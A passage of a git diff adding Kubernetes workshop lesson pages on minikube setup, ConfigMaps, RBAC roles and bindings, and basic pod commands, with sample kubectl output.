[Lab](https://kubedaily.com/docs/0.0.1/docker-compose-down/) | +|31.Docker Compose CLI - Events Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-events/) | +|32.Docker Compose CLI - Exec Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-exec/) | +|33.Docker Compose CLI - Images Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-images/) | +|34.Docker Compose CLI - Kill Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-kill/) | +|35.Docker Compose CLI - logs Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-logs/) | +|36.Docker Compose CLI - ls Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-ls/) | +|37.Docker Compose CLI - Pause/unpause Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-pause/) | +|38.Docker Compose CLI - Port Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-port/) | +|39.Docker Compose CLI - ps Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-port/) | +|40.Docker Compose CLI - pull Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-pull/) | +|41.Docker Compose CLI - push Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-push/) | +|42.Docker Compose CLI - restart Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-restart/)| +|43.Docker Compose CLI - rm Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-rm/) | +|44.Docker Compose CLI - run Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-run/) | +|45.Setup local network| [Lab](https://kubedaily.com/docs/0.0.1/local-network/) | +|46.Setup Remote network| [Lab](https://kubedaily.com/docs/0.0.1/remote-network/) | +|48.Newtorking in Docker Compose| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-net/) | +|49.Newtorking in Docker Compose with ngnix| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-ngnix-net/) | +|50.Docker Wordpress Example| [Lab](https://kubedaily.com/docs/0.0.1/docker-wordpress/) | + +Todo List + +51. +52. +53. + + + + + +What next +- [Container Security Track](https://kubedaily.com/docs/0.0.1/container-security/) +- [Kubernetes Workshop Track](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/k8s/_overview 2.md b/content/en/k8s/_overview 2.md new file mode 100644 index 0000000..502e644 --- /dev/null +++ b/content/en/k8s/_overview 2.md @@ -0,0 +1,30 @@ +--- +title: "Kubernetes" +url: "k8s/overview" +aliases: +- "/k8s" +--- + +### Table of Content + + +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab|[lab](https://kubedaily.com/k8s/kubernetes-setup/)| +|2.Basics of Pod|[lab](https://kubedaily.com/docs/0.0.1/k8s/basics-of-pods/)| +|3.Create POD with Command and Arguments|[lab](https://kubedaily.com/docs/0.0.1/k8s/pod-command-args/)| +|4.Multi-Container Pods|[lab](https://kubedaily.com/docs/0.0.1/k8s/multipod-container/)| +|5.Deployments & replication|[lab](https://kubedaily.com/docs/0.0.1/k8s/deployment-replicaset/)| +|6.Labels & Selectors|[lab](https://kubedaily.com/docs/0.0.1/k8s/labels-selectors/)| +|7.Kubernetes Service|[lab](https://kubedaily.com/docs/0.0.1/k8s/services/)| +|8.Service Type: NodePort,ClusterIP,LoadBalancer|[lab](https://kubedaily.com/docs/0.0.1/k8s/service-type/)| +|9.Ingress Controller|[lab](https://kubedaily.com/docs/0.0.1/k8s/ingress-controller/)| +|10.ConfigMap|[lab](https://kubedaily.com/docs/0.0.1/k8s/configmap/)| + + + +What next >> + +[kubernetes Security]
+[helm workshop]
+[Service Mesh]
\ No newline at end of file diff --git a/content/en/k8s/c1.Kubernetes-Setup 2.md b/content/en/k8s/c1.Kubernetes-Setup 2.md new file mode 100644 index 0000000..a61eb74 --- /dev/null +++ b/content/en/k8s/c1.Kubernetes-Setup 2.md @@ -0,0 +1,109 @@ +--- +title: " Pre-requisit for this lab " +description: " Multiple Way To creat Kubernetes cluster " +slug: "Pre-requisit for this lab" +--- + + +### Install Minikube + +```sh +https://minikube.sigs.k8s.io/docs/start/ +// i'm using mac so my installation step will be diffeent from you folks + +curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-darwin-amd64 +sudo install minikube-darwin-amd64 /usr/local/bin/minikube + + +``` + + +### ceate cluster using minikube + + +```sh +➜ k8sworkshop git:(main) βœ— minikube start +πŸ˜„ minikube v1.28.0 on Darwin 13.2.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +🐳 Preparing Kubernetes v1.25.3 on Docker 20.10.20 ... +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` +### check it out cluster information + +``` + +➜ k8sworkshop git:(main) βœ— kubectl cluster-info +Kubernetes control plane is running at https://127.0.0.1:51289 +CoreDNS is running at https://127.0.0.1:51289/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy + +To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'. +➜ k8sworkshop git:(main) βœ— + +``` + + +#### some basic commands to understand minikube + +```shell +minikube start +``` + +#### Access the Kubernetes dashboard running within the minikube cluster: + +```shell +minikube dashboard +``` + +#### Once started, you can interact with your cluster using `kubectl`, just like any other Kubernetes cluster. For instance, starting a server: + +```shell +kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0 +``` + +#### Exposing a service as a NodePort + +```shell +kubectl expose deployment hello-minikube --type=NodePort --port=8080 +``` + +#### minikube makes it easy to open this exposed endpoint in your browser: + +```shell +minikube service hello-minikube +``` + +#### Upgrade your cluster: + +```shell +minikube start --kubernetes-version=latest +``` + + +```shell +minikube start -p cluster2 +``` + +#### Stop your local cluster: + +```shell +minikube stop +``` + +#### Delete your local cluster: + +```shell +minikube delete +``` + +#### Delete all local clusters and profiles + +```shell +minikube delete --all +``` diff --git a/content/en/k8s/c10.ConfigMap 2.md b/content/en/k8s/c10.ConfigMap 2.md new file mode 100644 index 0000000..736ca6a --- /dev/null +++ b/content/en/k8s/c10.ConfigMap 2.md @@ -0,0 +1,136 @@ +--- +title: "ConfigMap " +description: " kubernetes Config " +slug: "ConfigMap" +--- + + +#### craete index-html-configmap.yaml with following content + +```yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: index-html-configmap + namespace: default +data: + index.html: | + +

Welcome

+
+

Hi! This is a configmap Index file

+ +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f index-html-configmap.yaml +configmap/index-html-configmap created + +``` + +#### craete nginx.yaml with following content + + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment + namespace: default +spec: + selector: + matchLabels: + app: nginx + replicas: 2 + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx:latest + ports: + - containerPort: 80 + volumeMounts: + - name: nginx-index-file + mountPath: /usr/share/nginx/html/ + volumes: + - name: nginx-index-file + configMap: + name: index-html-configmap + +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f ngnix.yaml +deployment.apps/nginx-deployment created +``` + +#### craete nginx-service.yaml with following content + + +```yaml + +apiVersion: v1 +kind: Service +metadata: + name: nginx-service + namespace: default +spec: + selector: + app: nginx + type: NodePort + ports: + - port: 80 + nodePort: 32000 + targetPort: 80 + + + ``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f nginx-service.yaml +service/nginx-service created +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +kubernetes ClusterIP 10.96.0.1 443/TCP 14h +nginx-service NodePort 10.105.136.166 80:32000/TCP 49s +web NodePort 10.100.132.142 8080:30646/TCP 123m +web2 NodePort 10.98.210.102 8080:31990/TCP 61m +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— minikube service nginx-service +|-----------|---------------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|---------------|-------------|---------------------------| +| default | nginx-service | 80 | http://192.168.49.2:32000 | +|-----------|---------------|-------------|---------------------------| +πŸƒ Starting tunnel for service nginx-service. +|-----------|---------------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|---------------|-------------|------------------------| +| default | nginx-service | | http://127.0.0.1:53149 | +|-----------|---------------|-------------|------------------------| +πŸŽ‰ Opening service default/nginx-service in default browser... +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + + +#### you will see output in browser +``` +Welcome + + +Hi! This is a configmap Index file +``` + + diff --git a/content/en/k8s/c11.RBAC 2.md b/content/en/k8s/c11.RBAC 2.md new file mode 100644 index 0000000..831d874 --- /dev/null +++ b/content/en/k8s/c11.RBAC 2.md @@ -0,0 +1,330 @@ +--- +title: "RBAC " +description: " kubernetes Config " +slug: "RBAC" +--- + +#### Role Based Access Control (RBAC) + +Role-Based Access Control (RBAC) in Kubernetes is a method of regulating access to computer or network resources based on the roles of individual users within an enterprise. In the context of Kubernetes, RBAC allows you to control who has access to the Kubernetes API and what they can do with those resources + + - Rules: A rule is a set of operations (verbs) that can be carried out on a group of resources which belong to different API Groups. + +##### kubectl explain role.rules + + ``` + kubectl explain role.rules +GROUP: rbac.authorization.k8s.io +KIND: Role +VERSION: v1 + +FIELD: rules <[]PolicyRule> + +DESCRIPTION: + Rules holds all the PolicyRules for this Role + PolicyRule holds information that describes a policy rule, but does not + contain information about who the rule applies to or which namespace the + rule applies to. + +FIELDS: + apiGroups <[]string> + APIGroups is the name of the APIGroup that contains the resources. If + multiple API groups are specified, any action requested against one of the + enumerated resources in any API group will be allowed. "" represents the + core API group and "*" represents all API groups. + + nonResourceURLs <[]string> + NonResourceURLs is a set of partial urls that a user should have access to. + *s are allowed, but only as the full, final step in the path Since + non-resource URLs are not namespaced, this field is only applicable for + ClusterRoles referenced from a ClusterRoleBinding. Rules can either apply to + API resources (such as "pods" or "secrets") or non-resource URL paths (such + as "/api"), but not both. + + resourceNames <[]string> + ResourceNames is an optional white list of names that the rule applies to. + An empty set means that everything is allowed. + + resources <[]string> + Resources is a list of resources this rule applies to. '*' represents all + resources. + + verbs <[]string> -required- + Verbs is a list of Verbs that apply to ALL the ResourceKinds contained in + this rule. '*' represents all verbs. + + ``` + + - Roles and ClusterRoles: Both consist of rules. The difference between a Role and a ClusterRole is the scope: in a Role, the rules are applicable to a single namespace, whereas a ClusterRole is cluster-wide, so the rules are applicable to more than one namespace. ClusterRoles can define rules for cluster-scoped resources (such as nodes) as well. Both Roles and ClusterRoles are mapped as API Resources inside our cluster. + + +##### kubectl explain role + ``` +kubernetesdaily.github.io git:(main) βœ— kubectl explain role +GROUP: rbac.authorization.k8s.io +KIND: Role +VERSION: v1 + +DESCRIPTION: + Role is a namespaced, logical grouping of PolicyRules that can be referenced + as a unit by a RoleBinding. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + rules <[]PolicyRule> + Rules holds all the PolicyRules for this Role + + ``` + +##### kubectl explain clusterroles + +``` +kubernetesdaily.github.io git:(main) βœ— kubectl explain clusterroles +GROUP: rbac.authorization.k8s.io +KIND: ClusterRole +VERSION: v1 + +DESCRIPTION: + ClusterRole is a cluster level, logical grouping of PolicyRules that can be + referenced as a unit by a RoleBinding or ClusterRoleBinding. + +FIELDS: + aggregationRule + AggregationRule is an optional field that describes how to build the Rules + for this ClusterRole. If AggregationRule is set, then the Rules are + controller managed and direct changes to Rules will be stomped by the + controller. + + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + rules <[]PolicyRule> + Rules holds all the PolicyRules for this ClusterRole +``` + + + - Subjects: These correspond to the entity that attempts an operation in the cluster. There are three types of subjects: + + - User Accounts: These are global, and meant for humans or processes living outside the cluster. There is no associated resource API Object in the Kubernetes cluster. + + - Service Accounts: This kind of account is namespaced and meant for intra-cluster processes running inside pods, which want to authenticate against the API. + + - Groups: This is used for referring to multiple accounts. There are some groups created by default such as cluster-admin (explained in later sections). + + - RoleBindings and ClusterRoleBindings: Just as the names imply, these bind subjects to roles (i.e. the operations a given user can perform). As for Roles and ClusterRoles, the difference lies in the scope: a RoleBinding will make the rules effective inside a namespace, whereas a ClusterRoleBinding will make the rules effective in all namespaces. + +#### kubectl explain rolebinding + + ``` + βœ— kubectl explain rolebindings +GROUP: rbac.authorization.k8s.io +KIND: RoleBinding +VERSION: v1 + +DESCRIPTION: + RoleBinding references a role, but does not contain it. It can reference a + Role in the same namespace or a ClusterRole in the global namespace. It adds + who information via Subjects and namespace information by which namespace it + exists in. RoleBindings in a given namespace only have effect in that + namespace. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + roleRef -required- + RoleRef can reference a Role in the current namespace or a ClusterRole in + the global namespace. If the RoleRef cannot be resolved, the Authorizer must + return an error. This field is immutable. + + subjects <[]Subject> + Subjects holds references to the objects the role applies to. + +``` +#### kubectl explain clusterrolebindings + +``` +kubectl explain clusterrolebindings +GROUP: rbac.authorization.k8s.io +KIND: ClusterRoleBinding +VERSION: v1 + +DESCRIPTION: + ClusterRoleBinding references a ClusterRole, but not contain it. It can + reference a ClusterRole in the global namespace, and adds who information + via Subject. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + roleRef -required- + RoleRef can only reference a ClusterRole in the global namespace. If the + RoleRef cannot be resolved, the Authorizer must return an error. This field + is immutable. + + subjects <[]Subject> + Subjects holds references to the objects the role applies to. + +``` + +With Minikube, you can experiment with RBAC in a local Kubernetes setup. Minikube comes with RBAC enabled by default if you start it with a Kubernetes version that supports RBAC + +``` + βœ— minikube start +πŸ˜„ minikube v1.30.1 on Darwin 14.1.1 (arm64) +πŸŽ‰ minikube 1.32.0 is available! Download it: https://github.com/kubernetes/minikube/releases/tag/v1.32.0 +πŸ’‘ To disable this notice, run: 'minikube config set WantUpdateNotification false' + +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring Flannel (Container Networking Interface) ... +🌟 Enabled addons: +πŸ”Ž Verifying Kubernetes components... +πŸ‘ Starting worker node minikube-m02 in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube-m02" ... +🌐 Found network options: + β–ͺ NO_PROXY=192.168.49.2 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... + β–ͺ env NO_PROXY=192.168.49.2 +πŸ”Ž Verifying Kubernetes components... +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +#### Create new namespace + +Execute the kubectl create command to create the namespace (as the admin user): + +``` +kubernetesdaily.github.io git:(main) βœ— kubectl create namespace kubedaily +namespace/kubedaily created +``` + +#### Create the user credentials + +genarete the user credentials using openssl command + +``` + openssl genrsa -out kubedaily.key 2048 +Generating RSA private key, 2048 bit long modulus +................................................................+++++ +.............................................................................+++++ +e is 65537 (0x10001) + +``` +Create a certificate sign request using openssl command + +``` + kubernetesdaily.github.io git:(main) βœ— openssl req -new -key kubedaily.key -out kubedaily.csr -subj "/CN=kubedaily/O=sangam" +``` + +``` +➜ .minikube ls +addons ca.pem certs key.pem machine_client.lock proxy-client-ca.crt +ca.crt cache config last_update_check machines proxy-client-ca.key +ca.key cert.pem files logs profiles tunnels.json +``` + +``` + kubernetesdaily.github.io git:(main) βœ— kubectl config set-credentials kubedaily --client-certificate=/.certs/kubedaily.crt --client-key=/.certs/kubedaily.key +User "kubedaily" set. +kubectl config set-context kubedaily-context --cluster=minikube --namespace=kubedaily --user=sangam +``` +Now you should get an access denied error when using the kubectl CLI with this configuration file. This is expected as we have not defined any permitted operations for this user. + +``` + kubectl --context=kubedaily-context get pods +``` + +#### Create the role for managing deployments + +``` +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + namespace: kubedaily + name: sangam +rules: +- apiGroups: ["", "extensions", "apps"] + resources: ["deployments", "replicasets", "pods"] + verbs: ["get", "list", "watch", "create", "update", "patch", "delete"] # You can also use ["*"] + +``` + +#### Create the role binding + +``` +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: sangam-binding + namespace: kubedaily +subjects: +- kind: User + name: sangam + apiGroup: "" +roleRef: + kind: Role + name: sangam + apiGroup: "" + +``` + +``` +➜ kubernetesdaily.github.io git:(main) βœ— kubectl create -f rolebinding-deployment-manager.yaml +rolebinding.rbac.authorization.k8s.io/sangam-binding created +``` \ No newline at end of file diff --git a/content/en/k8s/c2.Basics-of-pods 2.md b/content/en/k8s/c2.Basics-of-pods 2.md new file mode 100644 index 0000000..e633b27 --- /dev/null +++ b/content/en/k8s/c2.Basics-of-pods 2.md @@ -0,0 +1,310 @@ +--- +title: " Basics of Pod " +description: " Kubectl explain pod " +slug: "Basics-of-Pod" +--- + + +#### 0. What is POD learn via Kubectl Explain + + +```sh +kubectl explain pod +KIND: Pod +VERSION: v1 + +DESCRIPTION: + Pod is a collection of containers that can run on a host. This resource is + created by clients and scheduled onto hosts. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an + object. Servers should convert recognized schemas to the latest internal + value, and may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata + + spec + Specification of the desired behavior of the pod. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + status + Most recently observed status of the pod. This data may not be up to date. + Populated by the system. Read-only. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + + +``` + + +#### 1. Create a Pod from Nginx Image + +```sh +➜ k8sworkshop git:(main) βœ— kubectl run nginx --image=nginx + +pod/nginx created + +➜ k8sworkshop git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +nginx 1/1 Running 0 25s + +``` +#### 2. Create a Pod and Expose a Port +```sh +➜ k8sworkshop git:(main) βœ— kubectl run nginx-port --image=nginx --port=80 +pod/nginx-port created +➜ k8sworkshop git:(main) βœ— kubectl describe pod nginx-port +Name: nginx-port +Namespace: default +Priority: 0 +Service Account: default +Node: minikube/192.168.49.2 +Start Time: Mon, 06 Mar 2023 01:44:56 +0530 +Labels: run=nginx-port +Annotations: +Status: Running +IP: 172.17.0.4 +IPs: + IP: 172.17.0.4 +Containers: + nginx-port: + Container ID: docker://8260b161cc305d1cf4060dff9edbd0b05e86d9c4fc441b5a0a51b9dbe35403d3 + Image: nginx + Image ID: docker-pullable://nginx@sha256:aa0afebbb3cfa473099a62c4b32e9b3fb73ed23f2a75a65ce1d4b4f55a5c2ef2 + Port: 80/TCP + Host Port: 0/TCP + State: Running + Started: Mon, 06 Mar 2023 01:44:59 +0530 + Ready: True + Restart Count: 0 + Environment: + Mounts: + /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-ffpjx (ro) +Conditions: + Type Status + Initialized True + Ready True + ContainersReady True + PodScheduled True +Volumes: + kube-api-access-ffpjx: + Type: Projected (a volume that contains injected data from multiple sources) + TokenExpirationSeconds: 3607 + ConfigMapName: kube-root-ca.crt + ConfigMapOptional: + DownwardAPI: true +QoS Class: BestEffort +Node-Selectors: +Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s + node.kubernetes.io/unreachable:NoExecute op=Exists for 300s +Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal Scheduled 20s default-scheduler Successfully assigned default/nginx-port to minikube + Normal Pulling 20s kubelet Pulling image "nginx" + Normal Pulled 18s kubelet Successfully pulled image "nginx" in 2.236192917s + Normal Created 18s kubelet Created container nginx-port + Normal Started 18s kubelet Started container nginx-port +➜ k8sworkshop git:(main) βœ— +``` + + +#### 3. Output the Manifest File + +```sh +kubectl run nginx --image=nginx --port=80 --dry-run=client -o yaml +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + run: nginx + name: nginx +spec: + containers: + - image: nginx + name: nginx + ports: + - containerPort: 80 + resources: {} + dnsPolicy: ClusterFirst + restartPolicy: Always +status: {} +``` +alternative + + +```sh + kubectl run nginx --image=nginx --port=80 --dry-run=client -o yaml > ngnix.yaml +➜ k8sworkshop git:(main) βœ— ls +LICENSE context data ngnix.yaml package.json styles +README.md course.json lessons node_modules pages workshop +components csv next.config.js package-lock.json public +➜ k8sworkshop git:(main) βœ— cat ngnix.yaml +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + run: nginx + name: nginx +spec: + containers: + - image: nginx + name: nginx + ports: + - containerPort: 80 + resources: {} + dnsPolicy: ClusterFirst + restartPolicy: Always +status: {} +➜ k8sworkshop git:(main) βœ— + +``` + +#### 4. Delete PODS +```sh + k8sworkshop git:(main) βœ— kubectl delete pod nginx +pod "nginx" deleted + +➜ k8sworkshop git:(main) βœ— kubectl delete pod --all +pod "nginx-port" deleted +``` + + +#### List the Worker Node +```sh +kubectl get nodes +``` +#### Create a new POD from Nginx Image +```sh +kubectl run mywebserver --image=nginx +``` +#### List the PODS that are currently running. +```sh +kubectl get pods +``` +#### Connect inside the POD +```sh +kubectl exec -it mywebserver -- bash +``` +You can come out of the POD with CTRL+D +```sh +kubectl exec -it mywebserver -- ls -l / +``` +#### Delete the POD +```sh +kubectl delete pod mywebserver +``` + +##### pod-expose-port.yaml + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: nginx-pod +spec: + containers: + - image: nginx + name: democontainer + ports: + - containerPort: 8080 +``` +```sh +kubectl apply -f pod-expose-port.yaml +``` +```sh +kubectl get pods + +kubectl describe pod nginx-pod + +➜ k8sworkshop git:(main) βœ— kubectl explain pod.spec.containers.ports +KIND: Pod +VERSION: v1 + +RESOURCE: ports <[]Object> + +DESCRIPTION: + List of ports to expose from the container. Not specifying a port here DOES + NOT prevent that port from being exposed. Any port which is listening on + the default "0.0.0.0" address inside a container will be accessible from + the network. Modifying this array with strategic merge patch may corrupt + the data. For more information See + https://github.com/kubernetes/kubernetes/issues/108255. Cannot be updated. + + ContainerPort represents a network port in a single container. + +FIELDS: + containerPort -required- + Number of port to expose on the pod's IP address. This must be a valid port + number, 0 < x < 65536. + + hostIP + What host IP to bind the external port to. + + hostPort + Number of port to expose on the host. If specified, this must be a valid + port number, 0 < x < 65536. If HostNetwork is specified, this must match + ContainerPort. Most containers do not need this. + + name + If specified, this must be an IANA_SVC_NAME and unique within the pod. Each + named port in a pod must have a unique name. Name for the port that can be + referred to by services. + + protocol + Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + Possible enum values: + - `"SCTP"` is the SCTP protocol. + - `"TCP"` is the TCP protocol. + - `"UDP"` is the UDP protocol. + +➜ k8sworkshop git:(main) βœ— +``` + + +### Finding a Pod’s Cluster IP + +```sh +k8s101 git:(main) βœ— kubectl get pod -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +nginx-pod 1/1 Running 0 95s 172.17.0.7 minikube +nginx-port 1/1 Running 0 108m 172.17.0.3 minikube + +``` + +### Finding a Service’s IP + +We can find a Service IP using kubectl as well. In this case we will list all services in all namespaces: + +```sh +➜ k8s101 git:(main) βœ— kubectl get service --all-namespaces + +NAMESPACE NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +default kubernetes ClusterIP 10.96.0.1 443/TCP 114d +kube-system kube-dns ClusterIP 10.96.0.10 53/UDP,53/TCP,9153/TCP 114d +kube-system metrics-server ClusterIP 10.106.73.183 443/TCP 36m +kubernetes-dashboard dashboard-metrics-scraper ClusterIP 10.109.38.100 8000/TCP 110m +kubernetes-dashboard kubernetes-dashboard ClusterIP 10.108.78.110 80/TCP 110m +➜ k8s101 git:(main) βœ— + +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get pod nginx-pod --template='{{(index (index .spec.containers 0).ports 0).containerPort}}{{"\n"}}' +8080 + +``` + diff --git a/content/en/k8s/c3.pod-command-args 2.md b/content/en/k8s/c3.pod-command-args 2.md new file mode 100644 index 0000000..24eae37 --- /dev/null +++ b/content/en/k8s/c3.pod-command-args 2.md @@ -0,0 +1,141 @@ +--- +title: "Create POD with Command and Arguments " +description: " Kubectl explain pod " +slug: "Create-POD-with-Command-and-Arguments" +--- + +#### kubectl explain pods.spec.containers.command + +```sh +k8s101 git:(main) βœ— kubectl explain pods.spec.containers.command +KIND: Pod +VERSION: v1 + +FIELD: command <[]string> + +DESCRIPTION: + Entrypoint array. Not executed within a shell. The container image's + ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) + are expanded using the container's environment. If a variable cannot be + resolved, the reference in the input string will be unchanged. Double $$ + are reduced to a single $, which allows for escaping the $(VAR_NAME) + syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". + Escaped references will never be expanded, regardless of whether the + variable exists or not. Cannot be updated. More info: + https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell +➜ k8s101 git:(main) βœ— +``` + +#### Create POD without any commands or arguments. +args in Kubernetes overrides CMD in the original docker image. +command in Kubernetes overrides ENTRYPOINT in the original docker image. + +##### commands.yaml + +```yml +apiVersion: v1 +kind: Pod +metadata: + name: command +spec: + containers: + - image: busybox + name: count +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 0/1 CrashLoopBackOff 1 (5s ago) 15s +nginx-pod 1/1 Running 0 50m +nginx-port 1/1 Running 0 156m +webserver 1/1 Running 0 34m +➜ k8s101 git:(main) βœ— kubectl exec -it command -- bash + +``` + +#### Create POD with Command + +Modify the POD contents to the following one. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command2 +spec: + containers: + - image: busybox + name: count + command: ["sleep","3600"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command2 created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 1/1 Running 0 67s +➜ k8s101 git:(main) βœ— kubectl exec -it command2 -- sh +/ # ls +bin dev etc home lib lib64 proc root sys tmp usr var +/ # +``` + +#### Create POD with Command and Arguments + +Modify the YAML file contents to the following one. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command3 +spec: + containers: + - image: busybox + name: count + command: ["sleep"] + args: ["3600"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +pod/command3 created +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +command 1/1 Running 0 3m18s +command2 1/1 Running 0 2m34s +command3 1/1 Running 0 14s +``` + +#### Create POD with Arguments + +Modify the YAML file contents to the following one. + +```sh +apiVersion: v1 +kind: Pod +metadata: + name: command3 +spec: + containers: + - name: command3 + image: debian + command: ["printenv"] + args: ["HOSTNAME", "KUBERNETES_PORT"] +``` +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f commands.yaml +``` +```sh +➜ k8s101 git:(main) βœ— kubectl get pods +➜ k8s101 git:(main) βœ— kubectl logs command3 +command3 +tcp://10.96.0.1:443 +``` diff --git a/content/en/k8s/c4.multipod-container 2.md b/content/en/k8s/c4.multipod-container 2.md new file mode 100644 index 0000000..7dacfb8 --- /dev/null +++ b/content/en/k8s/c4.multipod-container 2.md @@ -0,0 +1,217 @@ +--- +title: "Multi-Container Pods" +description: " Use Cases for Multi-Container Pods " +slug: "Multi-Container-Pods" +--- + + +##### Why does Kubernetes allow more than one container in a Pod +- Containers in a Pod runs on a "logical host": they use the same network namespace (same IP address and port space), they can use shared volumes +- using several 